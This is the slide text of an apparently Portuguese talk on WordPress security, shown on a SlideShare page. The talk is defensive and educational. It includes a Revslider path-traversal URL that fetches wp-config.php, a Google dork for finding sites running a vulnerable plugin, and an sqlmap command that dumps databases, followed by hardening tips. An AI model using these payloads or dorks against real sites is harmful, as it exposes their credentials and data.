SlideShare ist ein Scribd-Unternehmen logo
1 von 26
Downloaden Sie, um offline zu lesen
WordPress Vs Hackers
A Rebelião das Máquinas
Quem somos
Thiago Lenon
O “Canive Suiço”
=
Diversas facetas
Hackers vs WordPress
Momento “Reflexão”
“O problema com os programadores é que você
nunca consegue saber o que eles estão fazendo
antes de ser tarde demais.”
Seymour Cray
“Quanto maior facilidade, maior a
probabilidade para o desenvolvedor fazer
cagada.”
Pensador desconhecido
Cruel realidade
Fonte https://wappalyzer.com/categories/cms (01/06/2015)
CMS mais utilizados
Cruel realidade
Vulnerabilidades por Ano
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)
Cruel realidade
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)
Tipos de Vulnerabilidades
Em qualquer lugar a qualquer hora
http://www.aszone.com.br/2015/06/list-of-potentially-affected-themes-wordpress/
Hackers vs WordPress
Local File Download
Exploit Revslider em ação.
LFD = Local File Download, explicar o que é, o que acontece no código.
● http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=/uploads/2015/06/wordpress-
camp.jpg
● http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../wp-config.php
Local File Download
Onde está o PROBLEMA ?
Local File Download
Local File Download
Sql Injection
Sql Injection
!passo
Dork:
inurl:season=*league_id=*matchday
https://google.com/search?q=inurl%3Aseason%3D*league_id%3D*match_day
Sql Injection
python sqlmap.py -u "http://localhost/wordpress/?
season=1&league_id=1&match_day=1&team_id=1" --dbs
Sql Injection
Sql Injection
Onde está o PROBLEMA ?
Sql Injection
Hackers vs WordPress
Dicas para sobrevivência
Durante desenvolvimento
● Siga os padrões de criação de temas e plugins do WordPress;
● Implemente testes unitários;
● Pratique "Par Programming";
● Pratique "Code Review";
● Pentest em ciclos evolutivos;
● Metodologia de desenvolvimento seguro;
Dicas para sobrevivência
WordPress
● Alteração do nome do usuário “admin” e senhas HARDCORE;
● Não instalar vários plugins de segurança;
● Antes de instalar pesquise sobre os plugins e temas;
● Modo Debug false;
● Manter o core, temas e plugins atualizados;
● Desabilitar a função de edição dos temas e plugins;
● Bloquear Brute force e visualização de pastas;
● Utilizar robots.txt ;
● Usar as constantes no wp-config:
WP_CONTENT_DIR, WP_PLUGIN_DIR, UPLOADS,
WP_AUTO_UPDATE_CORE, WP_HTTP_BLOCK_EXTERNAL
Dicas para sobrevivência
Infraestrutura e Segurança
● Prepração de infra;
● Uso de ferramentas de vulnerabilidades;
○ Use WpScan;
○ Use Accunetix;
○ Use Metaexploit;
● Alterar e bloquear o wp-admin/;
● Criar subdomínio para ambiente administrativo;
Obrigado !!!
@thiagodieb
@lenonleite
http://www.aszone.com.br

Weitere ähnliche Inhalte

Andere mochten auch

Curso online wordpress aula 1
Curso online wordpress aula 1Curso online wordpress aula 1
Curso online wordpress aula 1Vasco Marques
 
Tutorial modo router ubiquiti
Tutorial modo router ubiquitiTutorial modo router ubiquiti
Tutorial modo router ubiquitiFernando Keinz
 
Sodramar Segurança nas Instalações Hidráulicas
Sodramar Segurança nas Instalações HidráulicasSodramar Segurança nas Instalações Hidráulicas
Sodramar Segurança nas Instalações HidráulicasSol e Lazer Piscinas
 
Apostila Quimicos iGUi Piscinas
Apostila Quimicos iGUi PiscinasApostila Quimicos iGUi Piscinas
Apostila Quimicos iGUi PiscinasiGUi Piscinas
 
Guia Pratico para Tratamento de Piscinas HTH
Guia Pratico para Tratamento de Piscinas HTHGuia Pratico para Tratamento de Piscinas HTH
Guia Pratico para Tratamento de Piscinas HTHPool Shop Piscinas Ltda
 
WordPress para Gestores de Conteúdo - WordCamp BH 2015
WordPress para Gestores de Conteúdo - WordCamp BH 2015WordPress para Gestores de Conteúdo - WordCamp BH 2015
WordPress para Gestores de Conteúdo - WordCamp BH 2015Nauweb
 
Aula de virus esta aula ok
Aula de virus esta aula okAula de virus esta aula ok
Aula de virus esta aula okÉlida Tavares
 
Curso Básico de Tratamento para Piscinas
Curso Básico de Tratamento  para PiscinasCurso Básico de Tratamento  para Piscinas
Curso Básico de Tratamento para PiscinasPool Shop Piscinas Ltda
 
Manual de Filtros e Bombas da Sodramar
Manual de Filtros e Bombas da SodramarManual de Filtros e Bombas da Sodramar
Manual de Filtros e Bombas da SodramarCottage Casa E Lazer
 
Armas de fogo porte de armas- sistema nacional de armas- estatudo do desarma...
Armas de fogo  porte de armas- sistema nacional de armas- estatudo do desarma...Armas de fogo  porte de armas- sistema nacional de armas- estatudo do desarma...
Armas de fogo porte de armas- sistema nacional de armas- estatudo do desarma...Rosane Domingues
 
Design para WordPress- Anyssa Ferreira - WordCamp BH 2015
Design para WordPress-  Anyssa Ferreira - WordCamp BH 2015Design para WordPress-  Anyssa Ferreira - WordCamp BH 2015
Design para WordPress- Anyssa Ferreira - WordCamp BH 2015Anyssa Ferreira
 
Estatudo do desarmamento comentado
Estatudo do desarmamento comentadoEstatudo do desarmamento comentado
Estatudo do desarmamento comentadoandrebarroscosta
 
Vários tipos de vírus informáticos
Vários tipos de vírus informáticos Vários tipos de vírus informáticos
Vários tipos de vírus informáticos Dália Pereira
 
Manual de instruções das bombas e motobombas
Manual de instruções das bombas e motobombasManual de instruções das bombas e motobombas
Manual de instruções das bombas e motobombasPool Shop Piscinas Ltda
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoHeber Gutenberg
 

Andere mochten auch (20)

Filtros Para Piscinas Sodramar
Filtros Para Piscinas SodramarFiltros Para Piscinas Sodramar
Filtros Para Piscinas Sodramar
 
Curso online wordpress aula 1
Curso online wordpress aula 1Curso online wordpress aula 1
Curso online wordpress aula 1
 
Tutorial modo router ubiquiti
Tutorial modo router ubiquitiTutorial modo router ubiquiti
Tutorial modo router ubiquiti
 
Vírus and trojan horses
Vírus and trojan horsesVírus and trojan horses
Vírus and trojan horses
 
Sodramar Manual Skimmer
Sodramar Manual SkimmerSodramar Manual Skimmer
Sodramar Manual Skimmer
 
Sodramar Segurança nas Instalações Hidráulicas
Sodramar Segurança nas Instalações HidráulicasSodramar Segurança nas Instalações Hidráulicas
Sodramar Segurança nas Instalações Hidráulicas
 
Projeto de piscinas
Projeto de piscinasProjeto de piscinas
Projeto de piscinas
 
Apostila Quimicos iGUi Piscinas
Apostila Quimicos iGUi PiscinasApostila Quimicos iGUi Piscinas
Apostila Quimicos iGUi Piscinas
 
Guia Pratico para Tratamento de Piscinas HTH
Guia Pratico para Tratamento de Piscinas HTHGuia Pratico para Tratamento de Piscinas HTH
Guia Pratico para Tratamento de Piscinas HTH
 
WordPress para Gestores de Conteúdo - WordCamp BH 2015
WordPress para Gestores de Conteúdo - WordCamp BH 2015WordPress para Gestores de Conteúdo - WordCamp BH 2015
WordPress para Gestores de Conteúdo - WordCamp BH 2015
 
Aula de virus esta aula ok
Aula de virus esta aula okAula de virus esta aula ok
Aula de virus esta aula ok
 
Curso Básico de Tratamento para Piscinas
Curso Básico de Tratamento  para PiscinasCurso Básico de Tratamento  para Piscinas
Curso Básico de Tratamento para Piscinas
 
Manual de Filtros e Bombas da Sodramar
Manual de Filtros e Bombas da SodramarManual de Filtros e Bombas da Sodramar
Manual de Filtros e Bombas da Sodramar
 
Armas de fogo porte de armas- sistema nacional de armas- estatudo do desarma...
Armas de fogo  porte de armas- sistema nacional de armas- estatudo do desarma...Armas de fogo  porte de armas- sistema nacional de armas- estatudo do desarma...
Armas de fogo porte de armas- sistema nacional de armas- estatudo do desarma...
 
Design para WordPress- Anyssa Ferreira - WordCamp BH 2015
Design para WordPress-  Anyssa Ferreira - WordCamp BH 2015Design para WordPress-  Anyssa Ferreira - WordCamp BH 2015
Design para WordPress- Anyssa Ferreira - WordCamp BH 2015
 
Estatudo do desarmamento comentado
Estatudo do desarmamento comentadoEstatudo do desarmamento comentado
Estatudo do desarmamento comentado
 
Vários tipos de vírus informáticos
Vários tipos de vírus informáticos Vários tipos de vírus informáticos
Vários tipos de vírus informáticos
 
Manual de instruções das bombas e motobombas
Manual de instruções das bombas e motobombasManual de instruções das bombas e motobombas
Manual de instruções das bombas e motobombas
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
 
Armas de fogo
Armas de fogoArmas de fogo
Armas de fogo
 

Ähnlich wie WordPress Vs Hackers: Dicas para sobrevivência

AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWS
AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWSAWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWS
AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWSMarcelo Leite ☁
 
Hackers Pensando
Hackers PensandoHackers Pensando
Hackers Pensandorenanturrm
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Bravo Tecnologia
 
Palestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetPalestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetFabrício Basto
 
Website security
Website securityWebsite security
Website securitythiagosenac
 
Vírus, Antivírus e Firewall
Vírus, Antivírus e FirewallVírus, Antivírus e Firewall
Vírus, Antivírus e FirewallMariana Brito
 
1 o hacker profissional
1   o hacker profissional1   o hacker profissional
1 o hacker profissionaljohn luys
 
Palestra Fatec - Gestão
Palestra Fatec - GestãoPalestra Fatec - Gestão
Palestra Fatec - GestãoRenato Puccini
 
Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Eduardo Santana
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da InformaçãoVinicius Marangoni
 
Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1ponto hacker
 
Protegendo Seu Computador Dos VíRus E Trojans
Protegendo Seu Computador Dos VíRus E TrojansProtegendo Seu Computador Dos VíRus E Trojans
Protegendo Seu Computador Dos VíRus E Trojansguest7eb285
 
DevOps com Exemplos Práticos - QConRio 2014
DevOps com Exemplos Práticos - QConRio 2014DevOps com Exemplos Práticos - QConRio 2014
DevOps com Exemplos Práticos - QConRio 2014Leo Lorieri
 
Segurança da informação para WordPress e WooCommerce
Segurança da informação para WordPress e WooCommerceSegurança da informação para WordPress e WooCommerce
Segurança da informação para WordPress e WooCommerceThauã Cícero Santos Silva
 
Segurança da informação palestra wordcamp sp 2016
Segurança da informação   palestra wordcamp sp 2016Segurança da informação   palestra wordcamp sp 2016
Segurança da informação palestra wordcamp sp 2016Thauã Cícero Santos Silva
 

Ähnlich wie WordPress Vs Hackers: Dicas para sobrevivência (20)

AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWS
AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWSAWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWS
AWS Summit 2017 - Como proteger contra Ransomware minhas instâncias AWS
 
Segurança Digital
Segurança DigitalSegurança Digital
Segurança Digital
 
Hackers Pensando
Hackers PensandoHackers Pensando
Hackers Pensando
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa
 
Palestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetPalestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da Internet
 
Website security
Website securityWebsite security
Website security
 
Vírus, Antivírus e Firewall
Vírus, Antivírus e FirewallVírus, Antivírus e Firewall
Vírus, Antivírus e Firewall
 
1 o hacker profissional
1   o hacker profissional1   o hacker profissional
1 o hacker profissional
 
Palestra Fatec - Gestão
Palestra Fatec - GestãoPalestra Fatec - Gestão
Palestra Fatec - Gestão
 
Palestra
PalestraPalestra
Palestra
 
Unifesp sao jose
Unifesp sao joseUnifesp sao jose
Unifesp sao jose
 
Palestra
PalestraPalestra
Palestra
 
Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2
 
O que é Vírus e Antivírus
O que é Vírus e Antivírus O que é Vírus e Antivírus
O que é Vírus e Antivírus
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da Informação
 
Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1
 
Protegendo Seu Computador Dos VíRus E Trojans
Protegendo Seu Computador Dos VíRus E TrojansProtegendo Seu Computador Dos VíRus E Trojans
Protegendo Seu Computador Dos VíRus E Trojans
 
DevOps com Exemplos Práticos - QConRio 2014
DevOps com Exemplos Práticos - QConRio 2014DevOps com Exemplos Práticos - QConRio 2014
DevOps com Exemplos Práticos - QConRio 2014
 
Segurança da informação para WordPress e WooCommerce
Segurança da informação para WordPress e WooCommerceSegurança da informação para WordPress e WooCommerce
Segurança da informação para WordPress e WooCommerce
 
Segurança da informação palestra wordcamp sp 2016
Segurança da informação   palestra wordcamp sp 2016Segurança da informação   palestra wordcamp sp 2016
Segurança da informação palestra wordcamp sp 2016
 

Mehr von As Zone

Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...
Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...
Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...As Zone
 
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...As Zone
 
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...As Zone
 
Palestra - Meetup WordPress Brasília 2014 - WordPress vs Hacker
Palestra  - Meetup WordPress Brasília 2014 - WordPress vs HackerPalestra  - Meetup WordPress Brasília 2014 - WordPress vs Hacker
Palestra - Meetup WordPress Brasília 2014 - WordPress vs HackerAs Zone
 
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPress
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPressPalestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPress
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPressAs Zone
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoAs Zone
 

Mehr von As Zone (6)

Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...
Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...
Fisl 16 - Nem tudo o que reluz é ouro. hackeando as principais dicas de dese...
 
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...
Fisl 16 - WordPress vs Hacker - Descubra o que ainda é preciso saber para bl...
 
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...
Palestra - DFJUG Java 20 anos - Web Hacking - Desenvolva na defesa, jogando n...
 
Palestra - Meetup WordPress Brasília 2014 - WordPress vs Hacker
Palestra  - Meetup WordPress Brasília 2014 - WordPress vs HackerPalestra  - Meetup WordPress Brasília 2014 - WordPress vs Hacker
Palestra - Meetup WordPress Brasília 2014 - WordPress vs Hacker
 
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPress
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPressPalestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPress
Palestra - Flisol DF 2015 - WordPress vs Hacker . Blindando seu WordPress
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
 

WordPress Vs Hackers: Dicas para sobrevivência